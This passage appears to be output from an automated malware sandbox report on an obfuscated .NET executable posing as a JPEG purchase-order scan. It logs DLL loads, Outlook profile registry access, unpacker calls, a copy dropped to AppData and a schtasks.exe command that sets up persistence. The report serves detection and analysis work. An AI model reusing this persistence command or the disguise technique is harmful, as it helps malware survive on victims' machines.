                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.41d0b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs.Net Code: Eei3vKKCp3YTRj3t1Js System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.cs.Net Code: Eei3vKKCp3YTRj3t1Js System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.7c00000.5.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_05689168 pushad ; iretd 0_2_05689169
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0568916A push esp; iretd 0_2_05689171
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0573DF67 push eax; mov dword ptr [esp], ecx0_2_0573DF7C
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C0526 push ss; ret 0_2_0C1C0527
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 0_2_0C1C1638 pushfd ; iretd 0_2_0C1C1639
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06919233 push es; ret 6_2_06919244
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_05219168 pushad ; iretd 8_2_05219169
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_0521916B push esp; iretd 8_2_05219171
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 8_2_085A2FB0 push 280561D5h; iretd 8_2_085A3B35
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06969233 push es; ret 11_2_06969244
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: section name: .text entropy: 7.8591431826748455
                  Source: HJnkiZjAPsec.exe.0.drStatic PE information: section name: .text entropy: 7.8591431826748455
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, rUOgJt0bjpUgyk44Jk.csHigh entropy of concatenated method names: 'u7obr4x5Lf', 'GPkb0aQZgq', 'xRVbRyR4lv', 'lZWb1xHcSu', 'grDbmC17Tn', 'pRdb9WgDA7', 'JjabjGgQaK', 'bcRbPfdN2U', 'GbTbVGQJZb', 'OQ1bCwKkPa'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, vMdCrfAd4nqbuB563n.csHigh entropy of concatenated method names: 'dXybF8g5RL', 'MKhbJD1aLT', 'iiBbqG8wsU', 'DKlby3mqW1', 'EOtb6xO374', 'FZ3biDaCp5', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, lawgoLxSSTB4Kg1J3G.csHigh entropy of concatenated method names: 'EfampGBwqQ', 'gTbm0ic8Ol', 'FoRm1JXWfa', 'GBvm9aI5KF', 'V71mjyS8Bw', 'lOk1ejFGI2', 'iuy15IPr4N', 'fXb1oTAOrj', 'sDM1d3hiTE', 'BVP1QoJXGq'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, qRFW21zBV9snmNOmU0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jnFLkhAepT', 'lwuLfbNXmm', 'h18Ls6nV41', 'kCGLa4LW2t', 'L9TLbdNmYl', 'qA7LLFLcjF', 'zcnL44t6gG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, fnrqqnN3duUCtfDNFs.csHigh entropy of concatenated method names: 'B89F3K5C8Dxl2NV0OCr', 'pp796t5EgvAK0gjEOpv', 'GgambiqEGY', 'ngamLGj1yS', 'BY4m4rJPnd', 'uhUkNA5W9IWoSoDPjyJ', 'M1BeCv58iZrmG4npmIi'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, vB3hwc3YK8Lc8pDEAgo.csHigh entropy of concatenated method names: 'lTALl57U4a', 'GZ3Lv1HGYN', 'H0lLZBmnDH', 'M2sLuyKcbi', 'PwOLSXvEtL', 'ehlLW3Q7yC', 'FUTLw1eg45', 'TSxL8VNyso', 'Ir5LHOVxns', 'IjnLxMZBA9'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, HxyNHvlbf1bHwZm5Js.csHigh entropy of concatenated method names: 'i7YaV5BUj7', 'HgCaCiELxx', 'ToString', 'F0CarxRoCB', 'HgDa0Ty9GB', 'NqjaRQWoG8', 'xtFa1eND7K', 'Jv7amxQfDW', 'GpOa9kKxUh', 'pGDajUJMIF'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, fOO8vIHqZjUhSvlGIT.csHigh entropy of concatenated method names: 'S3vfGAEYB9', 'c2sfByidvx', 'FFef6Ljjdu', 'cbPfAk0xl2', 'rb9fJ6Nrpx', 'n6SfqupGbr', 'makfy5ZT1E', 'pwDfi8XcXO', 'Qq9f39Elbh', 'Nbef7ltrnV'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, v7j940IZEcFHWEp7Ga.csHigh entropy of concatenated method names: 'WidRuZIVJ0', 'MQwRWd5aX5', 'ds6R8eafKY', 'Rr7RHHA0Qn', 'EBiRf5mjJ0', 'RQNRs2E6qK', 'opfRaiVR7S', 'rIyRbIs2W8', 'K30RLVBAAY', 'm0VR4idEPN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, UZdRY7cogvT20oexjf.csHigh entropy of concatenated method names: 'ToString', 't0vsMmBUKm', 'OcZsJBUxwu', 'XFJsqnqsVB', 'tVdsyA7sIT', 'n0CsijUWdc', 'AOas3e2OIT', 'UW8s7OWRFE', 'fNJsOsF65A', 'DqCsEZDp1j'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, D4ioqt7O1wPYlWLKsR.csHigh entropy of concatenated method names: 'ApnadP2bs3', 'rk7atBw06f', 'HUjb2k3D5S', 'E4abYSDALn', 'yNAaM0i478', 'buFaBhSoPU', 'wwCaKbEvfG', 'HWLa6atuQA', 'mp3aA4Fh2X', 'WnPaXpNMNH'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, SuyLm2iEjbBSRtgLPT.csHigh entropy of concatenated method names: 'cZtLYDnprB', 'R5XLgHuvw7', 'Np4LTquifb', 'wBgLrovKIm', 'ELDL08hpHZ', 'GUfL1TC3pE', 'GgZLmJdCxR', 'GfMboVnZMZ', 'Juibd8JKy2', 'GIWbQBZPsG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, PHDnrB5XeaB5EXDJxo.csHigh entropy of concatenated method names: 'cOm1So05AA', 'aFu1wLVJwM', 'Q9uRqFEv11', 'DsjRyIBZTQ', 'TUDRi48gnI', 'd5BR38D4an', 'zGSR7plgsU', 'udGROs9EMM', 'WbnRE8LhcY', 'cYdRGslLbW'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nRLN6swQWbhX71tdG3.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gIFNQ2cG18', 'AGYNt5TAwH', 'QPpNzxZ9M8', 'fW7g2xrcwh', 'dPkgY1LZdb', 'aTqgNoYu9R', 'k08ggAuLP2', 'g6UpfQKqXGsZnATQZ4k'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, T9cHuLXm465sBShJQ5.csHigh entropy of concatenated method names: 'Dispose', 'GTXYQS6qDL', 'pw2NJcPpQe', 'yiuII46TVm', 'n53Ytl0OfF', 'DDJYzOfQLQ', 'ProcessDialogKey', 'GSpN2EI8y0', 'YfeNYnAINp', 'mHSNNj749n'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, BugJBK1VtFydZ6UXaU.csHigh entropy of concatenated method names: 'mqu9lyjgeg', 'nAU9vjhhsP', 'q6A9ZCMQh3', 'IfJ9u9JOIx', 'jSO9SuI6lS', 'lgP9WtbcHk', 'mju9wfvXZI', 'IoU98bKyjc', 'PyX9HAtxV8', 'g8W9xX5KLu'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, MFN8rg2GruKOYi7YiH.csHigh entropy of concatenated method names: 'nmgk8YZloV', 'AUlkH7AFxr', 'WoGkFCAoRY', 'DbHkJZ7BBW', 'RKHkyIDh8A', 'RrAkidfqsq', 'kwYk7SMI0L', 'jUbkONG9XM', 'ze0kGt91oF', 'cQKkMnkEnN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, d9gZaTJIdXurF7Iqc0.csHigh entropy of concatenated method names: 'ypXZdyB1Q', 'y7VuUXVuk', 'HLjWClp9U', 'KEowqItGK', 'UWIH9b8xc', 'AXZxqlOo5', 'tn6Zu3fyjyHW2Xydmc', 'dRevihZqsjLSKNkBwn', 'S43b8FnN7', 'zpF47DCvY'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, uFd20xUXZshMhqnhw3.csHigh entropy of concatenated method names: 'Stg9r2Am85', 'XZ69RX9CAh', 'Le99mpqpH9', 'XOTmtfOnkE', 'ARfmzAOV5v', 'kaQ92jQbID', 'Qyf9YhLcn2', 'W4M9N6jnQh', 'Op19gscMhL', 'Jsr9T4dHJ5'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.csHigh entropy of concatenated method names: 'C64gptgJxy', 'xiMgrlcCmt', 'uiCg01Us7o', 'bylgRdjNmN', 'z6xg1XyfxH', 'fxKgmORPkM', 'Y9jg9Fmaau', 'BRygjJujT3', 'lH0gPuE6MG', 'GP3gV0uU3f'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nhtqyFvX8yKhXJY77Y.csHigh entropy of concatenated method names: 'YLg063Fm5E', 'ckA0A9a9gn', 'QcS0X8I1Gw', 'sgS0DQUvfq', 'RNc0eiKSqI', 'PtR05fWZDj', 'q2X0oKpF8I', 'lb80d9MmVc', 'OMV0Q53gf8', 'Uf50tNNAEg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, wKw7XJ3eEkT0Yh3oA6U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fp546pvCgm', 'Y0e4A3mRF7', 'h8R4XVZO6q', 'zB84DHoYrG', 'TKF4eiIghU', 'xCC45JJTC9', 'G1W4oT9fTU'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, g7preEo0LavFFXlOLa.csHigh entropy of concatenated method names: 'S9QY9E3S2e', 'HIBYjCul7i', 'SmwYVYhZMI', 'cGXYCEfx4m', 'cgmYfN1Ds8', 'dNHYsQkMaM', 'wK1RObicwdXdwmr7cL', 'o62HfqXYnZw6BkCreT', 'h8xYYM8raJ', 'HdiYgWTwBg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, rUOgJt0bjpUgyk44Jk.csHigh entropy of concatenated method names: 'u7obr4x5Lf', 'GPkb0aQZgq', 'xRVbRyR4lv', 'lZWb1xHcSu', 'grDbmC17Tn', 'pRdb9WgDA7', 'JjabjGgQaK', 'bcRbPfdN2U', 'GbTbVGQJZb', 'OQ1bCwKkPa'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, vMdCrfAd4nqbuB563n.csHigh entropy of concatenated method names: 'dXybF8g5RL', 'MKhbJD1aLT', 'iiBbqG8wsU', 'DKlby3mqW1', 'EOtb6xO374', 'FZ3biDaCp5', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, lawgoLxSSTB4Kg1J3G.csHigh entropy of concatenated method names: 'EfampGBwqQ', 'gTbm0ic8Ol', 'FoRm1JXWfa', 'GBvm9aI5KF', 'V71mjyS8Bw', 'lOk1ejFGI2', 'iuy15IPr4N', 'fXb1oTAOrj', 'sDM1d3hiTE', 'BVP1QoJXGq'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, qRFW21zBV9snmNOmU0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jnFLkhAepT', 'lwuLfbNXmm', 'h18Ls6nV41', 'kCGLa4LW2t', 'L9TLbdNmYl', 'qA7LLFLcjF', 'zcnL44t6gG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, fnrqqnN3duUCtfDNFs.csHigh entropy of concatenated method names: 'B89F3K5C8Dxl2NV0OCr', 'pp796t5EgvAK0gjEOpv', 'GgambiqEGY', 'ngamLGj1yS', 'BY4m4rJPnd', 'uhUkNA5W9IWoSoDPjyJ', 'M1BeCv58iZrmG4npmIi'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, vB3hwc3YK8Lc8pDEAgo.csHigh entropy of concatenated method names: 'lTALl57U4a', 'GZ3Lv1HGYN', 'H0lLZBmnDH', 'M2sLuyKcbi', 'PwOLSXvEtL', 'ehlLW3Q7yC', 'FUTLw1eg45', 'TSxL8VNyso', 'Ir5LHOVxns', 'IjnLxMZBA9'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, HxyNHvlbf1bHwZm5Js.csHigh entropy of concatenated method names: 'i7YaV5BUj7', 'HgCaCiELxx', 'ToString', 'F0CarxRoCB', 'HgDa0Ty9GB', 'NqjaRQWoG8', 'xtFa1eND7K', 'Jv7amxQfDW', 'GpOa9kKxUh', 'pGDajUJMIF'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, fOO8vIHqZjUhSvlGIT.csHigh entropy of concatenated method names: 'S3vfGAEYB9', 'c2sfByidvx', 'FFef6Ljjdu', 'cbPfAk0xl2', 'rb9fJ6Nrpx', 'n6SfqupGbr', 'makfy5ZT1E', 'pwDfi8XcXO', 'Qq9f39Elbh', 'Nbef7ltrnV'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, v7j940IZEcFHWEp7Ga.csHigh entropy of concatenated method names: 'WidRuZIVJ0', 'MQwRWd5aX5', 'ds6R8eafKY', 'Rr7RHHA0Qn', 'EBiRf5mjJ0', 'RQNRs2E6qK', 'opfRaiVR7S', 'rIyRbIs2W8', 'K30RLVBAAY', 'm0VR4idEPN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, UZdRY7cogvT20oexjf.csHigh entropy of concatenated method names: 'ToString', 't0vsMmBUKm', 'OcZsJBUxwu', 'XFJsqnqsVB', 'tVdsyA7sIT', 'n0CsijUWdc', 'AOas3e2OIT', 'UW8s7OWRFE', 'fNJsOsF65A', 'DqCsEZDp1j'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, D4ioqt7O1wPYlWLKsR.csHigh entropy of concatenated method names: 'ApnadP2bs3', 'rk7atBw06f', 'HUjb2k3D5S', 'E4abYSDALn', 'yNAaM0i478', 'buFaBhSoPU', 'wwCaKbEvfG', 'HWLa6atuQA', 'mp3aA4Fh2X', 'WnPaXpNMNH'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, SuyLm2iEjbBSRtgLPT.csHigh entropy of concatenated method names: 'cZtLYDnprB', 'R5XLgHuvw7', 'Np4LTquifb', 'wBgLrovKIm', 'ELDL08hpHZ', 'GUfL1TC3pE', 'GgZLmJdCxR', 'GfMboVnZMZ', 'Juibd8JKy2', 'GIWbQBZPsG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, PHDnrB5XeaB5EXDJxo.csHigh entropy of concatenated method names: 'cOm1So05AA', 'aFu1wLVJwM', 'Q9uRqFEv11', 'DsjRyIBZTQ', 'TUDRi48gnI', 'd5BR38D4an', 'zGSR7plgsU', 'udGROs9EMM', 'WbnRE8LhcY', 'cYdRGslLbW'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nRLN6swQWbhX71tdG3.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gIFNQ2cG18', 'AGYNt5TAwH', 'QPpNzxZ9M8', 'fW7g2xrcwh', 'dPkgY1LZdb', 'aTqgNoYu9R', 'k08ggAuLP2', 'g6UpfQKqXGsZnATQZ4k'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, T9cHuLXm465sBShJQ5.csHigh entropy of concatenated method names: 'Dispose', 'GTXYQS6qDL', 'pw2NJcPpQe', 'yiuII46TVm', 'n53Ytl0OfF', 'DDJYzOfQLQ', 'ProcessDialogKey', 'GSpN2EI8y0', 'YfeNYnAINp', 'mHSNNj749n'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, BugJBK1VtFydZ6UXaU.csHigh entropy of concatenated method names: 'mqu9lyjgeg', 'nAU9vjhhsP', 'q6A9ZCMQh3', 'IfJ9u9JOIx', 'jSO9SuI6lS', 'lgP9WtbcHk', 'mju9wfvXZI', 'IoU98bKyjc', 'PyX9HAtxV8', 'g8W9xX5KLu'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, MFN8rg2GruKOYi7YiH.csHigh entropy of concatenated method names: 'nmgk8YZloV', 'AUlkH7AFxr', 'WoGkFCAoRY', 'DbHkJZ7BBW', 'RKHkyIDh8A', 'RrAkidfqsq', 'kwYk7SMI0L', 'jUbkONG9XM', 'ze0kGt91oF', 'cQKkMnkEnN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, d9gZaTJIdXurF7Iqc0.csHigh entropy of concatenated method names: 'ypXZdyB1Q', 'y7VuUXVuk', 'HLjWClp9U', 'KEowqItGK', 'UWIH9b8xc', 'AXZxqlOo5', 'tn6Zu3fyjyHW2Xydmc', 'dRevihZqsjLSKNkBwn', 'S43b8FnN7', 'zpF47DCvY'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, uFd20xUXZshMhqnhw3.csHigh entropy of concatenated method names: 'Stg9r2Am85', 'XZ69RX9CAh', 'Le99mpqpH9', 'XOTmtfOnkE', 'ARfmzAOV5v', 'kaQ92jQbID', 'Qyf9YhLcn2', 'W4M9N6jnQh', 'Op19gscMhL', 'Jsr9T4dHJ5'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.csHigh entropy of concatenated method names: 'C64gptgJxy', 'xiMgrlcCmt', 'uiCg01Us7o', 'bylgRdjNmN', 'z6xg1XyfxH', 'fxKgmORPkM', 'Y9jg9Fmaau', 'BRygjJujT3', 'lH0gPuE6MG', 'GP3gV0uU3f'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nhtqyFvX8yKhXJY77Y.csHigh entropy of concatenated method names: 'YLg063Fm5E', 'ckA0A9a9gn', 'QcS0X8I1Gw', 'sgS0DQUvfq', 'RNc0eiKSqI', 'PtR05fWZDj', 'q2X0oKpF8I', 'lb80d9MmVc', 'OMV0Q53gf8', 'Uf50tNNAEg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, wKw7XJ3eEkT0Yh3oA6U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fp546pvCgm', 'Y0e4A3mRF7', 'h8R4XVZO6q', 'zB84DHoYrG', 'TKF4eiIghU', 'xCC45JJTC9', 'G1W4oT9fTU'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, g7preEo0LavFFXlOLa.csHigh entropy of concatenated method names: 'S9QY9E3S2e', 'HIBYjCul7i', 'SmwYVYhZMI', 'cGXYCEfx4m', 'cgmYfN1Ds8', 'dNHYsQkMaM', 'wK1RObicwdXdwmr7cL', 'o62HfqXYnZw6BkCreT', 'h8xYYM8raJ', 'HdiYgWTwBg'
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
